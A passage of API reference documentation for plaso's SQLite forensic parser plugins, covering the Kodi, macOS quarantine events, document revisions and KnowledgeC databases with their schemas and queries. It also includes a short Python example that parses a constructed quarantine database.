bool,ViewMode integer,ZoomAmount float, PixelRatio float, VerticalShift float, AudioStream integer, SubtitleStream integer,SubtitleDelay float, SubtitlesOn bool, Brightness float, Contrast float, Gamma float,VolumeAmplification float, AudioDelay float, OutputToAllSpeakers bool, ResumeTime integer,Sharpness float, NoiseReduction float, NonLinStretch bool, PostProcess bool,ScalingMethod integer, DeinterlaceMode integer, StereoMode integer, StereoInvert bool, VideoStream integer)', 'stacktimes': 'CREATE TABLE stacktimes (idFile integer, times text)', 'streamdetails': 'CREATE TABLE streamdetails (idFile integer, iStreamType integer, strVideoCodec text, fVideoAspect float, iVideoWidth integer, iVideoHeight integer, strAudioCodec text, iAudioChannels integer, strAudioLanguage text, strSubtitleLanguage text, iVideoDuration integer, strStereoMode text, strVideoLanguage text)', 'studio': 'CREATE TABLE studio ( studio_id integer primary key, name TEXT)', 'studio_link': 'CREATE TABLE studio_link (studio_id integer, 
media_id integer, media_type TEXT)', 'tag': 'CREATE TABLE tag (tag_id integer primary key, name TEXT)', 'tag_link': 'CREATE TABLE tag_link (tag_id integer, media_id integer, media_type TEXT)', 'tvshow': 'CREATE TABLE tvshow ( idShow integer primary key,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, duration INTEGER)', 'tvshowlinkpath': 'CREATE TABLE tvshowlinkpath (idShow integer, idPath integer)', 'uniqueid': 'CREATE TABLE uniqueid (uniqueid_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, value TEXT, type TEXT)', 'version': 'CREATE TABLE version (idVersion integer, iCompressCount integer)', 'writer_link': 'CREATE TABLE writer_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)'}]
class plaso.parsers.sqlite_plugins.kodi.KodiVideoEventData
Bases: plaso.containers.events.EventData
Kodi video event data.
filename: video filename.
Type str
play_count: number of times the video has been played.
Type int
DATA_TYPE = 'kodi:videos:viewing'
plaso.parsers.sqlite_plugins.ls_quarantine module
SQLite parser plugin for MacOS LS quarantine events database files.
class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventData
Bases: plaso.containers.events.EventData
MacOS launch services quarantine event data.
data: data.
Type bytes
url: original URL of the file.
Type str
user_agent: user agent that was used to download the file.
Type str
DATA_TYPE = 'macosx:lsquarantine'
class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS LS quarantine events database files.
The MacOS launch services (LS) quarantine database file is typically stored in: /Users/<username>/Library/Preferences/QuarantineEvents.com.apple.LaunchServices
DATA_FORMAT = 'MacOS launch services quarantine events database SQLite database file'
NAME = 'ls_quarantine'
ParseLSQuarantineRow(parser_mediator, query, row, **unused_kwargs)
Parses a launch services quarantine event row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT LSQuarantineTimestamp AS Time, LSQuarantineAgentName AS Agent, LSQuarantineOriginURLString AS URL, LSQuarantineDataURLString AS Data FROM LSQuarantineEvent ORDER BY Time', 'ParseLSQuarantineRow')]
REQUIRED_STRUCTURE = {'LSQuarantineEvent': frozenset({'LSQuarantineAgentName', 'LSQuarantineDataURLString', 'LSQuarantineOriginURLString', 'LSQuarantineTimestamp'})}
SCHEMAS = [{'LSQuarantineEvent': 'CREATE TABLE LSQuarantineEvent ( LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL, LSQuarantineTimeStamp REAL, LSQuarantineAgentBundleIdentifier TEXT, LSQuarantineAgentName TEXT, LSQuarantineDataURLString TEXT, LSQuarantineSenderName TEXT, LSQuarantineSenderAddress TEXT, LSQuarantineTypeNumber INTEGER, LSQuarantineOriginTitle TEXT, LSQuarantineOriginURLString TEXT, LSQuarantineOriginAlias BLOB )'}]
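The three class attributes above are what make a SQLite plugin work: REQUIRED_STRUCTURE decides whether a candidate database is this artifact at all, QUERIES pulls the rows, and the row callback turns each row into event data. As an added worked example (not plaso's own code), the Python below builds an in-memory database from the LSQuarantineEvent schema listed above, checks it against REQUIRED_STRUCTURE the way a plugin must before querying, and runs the plugin's query over a few constructed rows. The helper names, the sample rows and the interpretation of LSQuarantineTimeStamp as a Cocoa timestamp (seconds since 2001-01-01 UTC) are this example's own assumptions, not statements from the page.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Schema and query as listed for LsQuarantinePlugin above.
LSQUARANTINE_SCHEMA = (
    'CREATE TABLE LSQuarantineEvent ( LSQuarantineEventIdentifier TEXT '
    'PRIMARY KEY NOT NULL, LSQuarantineTimeStamp REAL, '
    'LSQuarantineAgentBundleIdentifier TEXT, LSQuarantineAgentName TEXT, '
    'LSQuarantineDataURLString TEXT, LSQuarantineSenderName TEXT, '
    'LSQuarantineSenderAddress TEXT, LSQuarantineTypeNumber INTEGER, '
    'LSQuarantineOriginTitle TEXT, LSQuarantineOriginURLString TEXT, '
    'LSQuarantineOriginAlias BLOB )')

REQUIRED_STRUCTURE = {
    'LSQuarantineEvent': frozenset({
        'LSQuarantineAgentName', 'LSQuarantineDataURLString',
        'LSQuarantineOriginURLString', 'LSQuarantineTimestamp'})}

QUERY = (
    'SELECT LSQuarantineTimestamp AS Time, LSQuarantineAgentName AS Agent, '
    'LSQuarantineOriginURLString AS URL, LSQuarantineDataURLString AS Data '
    'FROM LSQuarantineEvent ORDER BY Time')

# Assumption of this example: the REAL timestamp counts seconds since the
# Cocoa epoch (2001-01-01 UTC).
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def build_sample_database():
    """Returns an in-memory database populated with constructed rows."""
    connection = sqlite3.connect(':memory:')
    connection.row_factory = sqlite3.Row
    connection.execute(LSQUARANTINE_SCHEMA)
    # Constructed sample rows; the hosts are documentation placeholders.
    rows = [
        ('event-1', 600000000.0, 'com.apple.Safari', 'Safari',
         'https://example.com/files/report.pdf', 'https://example.com/downloads'),
        ('event-2', 599999000.0, 'com.apple.mail', 'Mail',
         'https://files.example.net/setup.dmg', None)]
    connection.executemany(
        'INSERT INTO LSQuarantineEvent (LSQuarantineEventIdentifier, '
        'LSQuarantineTimeStamp, LSQuarantineAgentBundleIdentifier, '
        'LSQuarantineAgentName, LSQuarantineDataURLString, '
        'LSQuarantineOriginURLString) VALUES (?, ?, ?, ?, ?, ?)', rows)
    connection.commit()
    return connection


def has_required_structure(connection, required_structure):
    """Checks that every required table and column exists.

    Names are compared case-insensitively, which is how SQLite resolves
    identifiers (the schema spells LSQuarantineTimeStamp, the query
    LSQuarantineTimestamp).
    """
    for table_name, columns in required_structure.items():
        # table_name comes from a trusted constant, not from the evidence file.
        cursor = connection.execute('PRAGMA table_info({0:s})'.format(table_name))
        present = {row['name'].lower() for row in cursor}
        if not present:  # PRAGMA returns no rows for a missing table
            return False
        if not {column.lower() for column in columns} <= present:
            return False
    return True


def parse_quarantine_events(connection):
    """Runs the plugin query and returns one dict per event, oldest first."""
    events = []
    for row in connection.execute(QUERY):
        timestamp = COCOA_EPOCH + timedelta(seconds=row['Time'])
        events.append({
            'timestamp': timestamp.isoformat(),
            'agent': row['Agent'],
            'url': row['URL'],
            'data': row['Data']})
    return events


if __name__ == '__main__':
    database = build_sample_database()
    if has_required_structure(database, REQUIRED_STRUCTURE):
        for event in parse_quarantine_events(database):
            print(event)
```

The structure check runs first on purpose: a database with the right file name but a different schema would otherwise fail inside the query, and a plugin that silently matches the wrong database produces misleading timeline entries. Each returned event carries the downloading agent and the origin URL alongside the data URL, which is the download provenance a responder looks for when tracing how a file arrived on a Mac.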
plaso.parsers.sqlite_plugins.mac_document_versions module
SQLite parser plugin for MacOS document revision database files.
class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventData
Bases: plaso.containers.events.EventData
MacOS document revision event data.
name: name of the original file.
Type str
path: path from the original file.
Type str
version_path: path to the version copy of the original file.
Type str
last_time: the system user ID of the user that opened the file.
Type str
user_sid: identification user ID that opened the file.
Type str
DATA_TYPE = 'mac:document_versions:file'
class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS document revision database files.
DATA_FORMAT = 'MacOS document revisions SQLite database file'
DocumentVersionsRow(parser_mediator, query, row, **unused_kwargs)
Parses a document versions row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
NAME = 'mac_document_versions'
QUERIES = [('SELECT f.file_name AS name, f.file_path AS path, f.file_last_seen AS last_time, g.generation_path AS version_path, g.generation_add_time AS version_time FROM files f, generations g WHERE f.file_storage_id = g.generation_storage_id;', 'DocumentVersionsRow')]
REQUIRED_STRUCTURE = {'files': frozenset({'file_last_seen', 'file_name', 'file_path', 'file_storage_id'}), 'generations': frozenset({'generation_add_time', 'generation_path', 'generation_storage_id'})}
ROOT_VERSION_PATH = '/.DocumentRevisions-V100/'
SCHEMAS = [{'files': 'CREATE TABLE files (file_row_id INTEGER PRIMARY KEY ASC, file_name TEXT, file_parent_id INTEGER, file_path TEXT, file_inode INTEGER, file_last_seen INTEGER NOT NULL DEFAULT 0, file_status INTEGER NOT NULL DEFAULT 1, file_storage_id INTEGER NOT NULL)', 'generations': 'CREATE TABLE generations (generation_id INTEGER PRIMARY KEY ASC, generation_storage_id INTEGER NOT NULL, generation_name TEXT NOT NULL, generation_client_id TEXT NOT NULL, generation_path TEXT UNIQUE, generation_options INTEGER NOT NULL DEFAULT 1, generation_status INTEGER NOT NULL DEFAULT 1, generation_add_time INTEGER NOT NULL DEFAULT 0, generation_size INTEGER NOT NULL DEFAULT 0, generation_prunable INTEGER NOT NULL DEFAULT 0)', 'storage': 'CREATE TABLE storage (storage_id INTEGER PRIMARY KEY ASC AUTOINCREMENT, storage_options INTEGER NOT NULL DEFAULT 1, storage_status INTEGER NOT NULL DEFAULT 1)'}]
plaso.parsers.sqlite_plugins.mac_knowledgec module
SQLite parser plugin for MacOS Duet/KnowledgeC database files.
class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData
Bases: plaso.containers.events.EventData
KnowledgeC application execution event data.
bundle_identifier: bundle identifier of the application.
Type str
duration: duration of the activity.
Type int
DATA_TYPE = 'mac:knowledgec:application'
class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS Duet/KnowledgeC database files.
DATA_FORMAT = 'MacOS Duet / KnowledgeC SQLites database file'
KnowledgeCRow(parser_mediator, query, row, **unused_kwargs)
Parses KnowledgeC application activity.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
NAME = 'mac_knowledgec'
QUERIES = [('\n SELECT\n ZOBJECT.ZCREATIONDATE AS "entry_creation", \n ZOBJECT.ZSTARTDATE AS "start", \n ZOBJECT.ZENDDATE AS "end",\n ZOBJECT.ZSTREAMNAME AS "action",\n ZOBJECT.ZVALUESTRING AS "zvaluestring",\n ZSTRUCTUREDMETADATA.Z_DKSAFARIHISTORYMETADATAKEY__TITLE AS "title"\n FROM ZOBJECT\n LEFT JOIN ZSTRUCTUREDMETADATA \n ON ZOBJECT.ZSTRUCTUREDMETADATA = ZSTRUCTUREDMETADATA.Z_PK\n ', 'KnowledgeCRow')]
REQUIRED_STRUCTURE = {'ZOBJECT': frozenset({'ZCREATIONDATE', 'ZENDDATE', 'ZSTARTDATE', 'ZSTREAMNAME', 'ZVALUESTRING'}), 'ZSTRUCTUREDMETADATA': frozenset({'Z_DKSAFARIHISTORYMETADATAKEY__TITLE'})}
SCHEMAS = [{'ACHANGE': 'CREATE TABLE ACHANGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHANGETYPE INTEGER, ZENTITY INTEGER, ZENTITYPK INTEGER, ZTRANSACTIONID INTEGER, ZCOLUMNS BLOB, ZTOMBSTONE0 BLOB, ZTOMBSTONE1 BLOB, ZTOMBSTONE2 BLOB )', 'ATRANSACTION': 'CREATE TABLE ATRANSACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZTIMESTAMP FLOAT, ZAUTHOR VARCHAR, ZBUNDLEID VARCHAR, ZCONTEXTNAME VARCHAR, ZPROCESSID VARCHAR, ZQUERYGEN BLOB )', 'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, 
ZSTARTDATE TIMESTAMP, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCOUNT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZSTRINGVALUE VARCHAR )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z8_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZSUBJECT INTEGER, Z8_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, 
Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_DKSUNRISESUNSETMETADATAKEY__ISDAYLIGHT INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNSET TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, 
Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, 
Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR UNIQUE, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_10EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_10EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE 
TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}, {'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 